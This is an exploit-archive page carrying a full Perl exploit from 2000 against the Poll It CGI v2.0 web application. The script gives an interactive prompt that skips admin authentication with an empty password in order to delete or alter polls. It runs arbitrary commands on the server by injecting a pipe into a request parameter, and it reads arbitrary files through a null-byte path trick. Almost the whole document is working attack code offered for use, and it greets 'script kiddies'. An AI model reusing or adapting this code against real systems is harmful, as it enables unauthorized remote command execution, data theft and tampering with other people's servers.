[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Poll It CGI v2.0 exploit
# Published : 2000-11-15
# Author : keelis
# Previous Title : UtilMind Mail List 1.7 - Users Can Execute Commands
# Next Title : News Update 1.1 Change Admin Password
#!/usr/bin/perl
######################################
# #
# #
# Poll It CGI v2.0 exploit #
# keelis/havoc korp 2000 #
# #
# shouts to modjo, p, zen, kd, #
# ab, all the script kiddies. #
# #
# #
# keelis(at)hushmail(dot)com #
# #
# #
######################################
use Socket;
($host, $cgi_loc) = @ARGV[0,1];
$ip=inet_aton($host);
print("nt+--- Poll It CGI v2.0 exploit ---+");
print("nt+--- keelis/havoc korp 2000 ---+nnn");
usage() if (!defined($host) || !defined($cgi_loc));
while(true)
{
print "[poll@$host] ";
$stdin = *STDIN;
$cmdin = <$stdin>;
chomp($cmdin);
($cmd, $param) = split(/ /, $cmdin, 2);
if ($cmd eq "d")
{
$request = "?load=admin&admin_password=&action=delete_poll";
$success_msg = "current poll has been deletednn";
make_request();
}
if ($cmd eq "e")
{
$request = "?load=admin&admin_password=&action=expire_poll";
$success_msg = "current poll has been expirednn";
make_request();
}
if ($cmd eq "c")
{
if (!defined($param))
{
print "you need to specify a voting topic for the new pollnn";
next;
}
$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";
$success_msg = "created new poll with voting topic: "$param"nn";
make_request();
}
if ($cmd eq "a")
{
if (!defined($param))
{
print "you need to specify the text for the new voting optionnn";
next;
}
$request = "?load=admin&admin_password=&action=add_option&add_option=$param";
$success_msg = "voting option added to current poll: "$param"nn";
make_request();
}
if ($cmd eq "g")
{
if (!defined($param))
{
print "you need to specify the command to be runnn";
next;
}
$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";
$success_msg = "command has been run on remote server: "$param"nn";
make_request();
}
if ($cmd eq "r")
{
if (!defined($param))
{
print "you need to specify the file to be readnn";
next;
}
$request = "?load=admin&data_dir=$param%00";
$success_msg = "contents of "$param" follow:nn";
make_request();
}
if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")
{
print "n? ttshow this help screenn";
print "d ttdelete current polln";
print "e ttexpire current polln";
print "c <param>tcreate new poll using <param> as topicn";
print "a <param>tadd <param> to voting optionsn";
print "r <param>tread the file <param> in remote servern";
print "g <param>trun <param> in the remote servern";
print "x ttexit pollex.pl shellnn";
next;
}
if ($cmd eq "x")
{
print "n";
last;
}
print "command not found. use "?" for help screen.nn";
}
sub make_request {
$request=~s/ /+/g;
$request=~s/\/%5C/g;
$request=~s///%2F/g;
my @req=sendraw("GET $cgi_loc$request HTTP/1.1rnHost: $hostrnrn");
$reqanswer=join('', @req);
($httpv, $httpcode) = split(/ /, $reqanswer);
$httpcode = substr($httpcode, 0, 3);
if ($httpcode eq "200") {
print $success_msg if ($cmd ne "r");
} else {
if ($httpcode ne "404")
{
print "httpd returned an error code:nn";
print $reqanswer,"n";
} else {
die "unexpected httpd error code 404. aborting...nn"
}
}
if ($cmd eq "r")
{ $reqanswer=substr($reqanswer, index($reqanswer, "rnrn")+4);
if (substr($reqanswer, 6, 15) eq "Template : File")
{
print "file "$param" not found or non-readable from cginn";
} else {
print $success_msg;
print $reqanswer,"n";
}
}
next;
}
sub usage {
print "Usage: pollex.pl <host> <cgi_loc>nn";
print "thost :thost/ip where CGI residesn";
print "tcgi_loc:tpath to the CGI (non-SSI version needed)nn";
exit(0);
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("socket problems... aborting.n");
if(connect(S,pack "SnA4x8",2,80,$ip)){
select(S);
$|=1;
print $pstr;
my @in=<S>;
select(STDOUT);
close(S);
return @in;
} else {
die("can't connect... aborting.n");
}
}
# www.Syue.com [2000-11-15]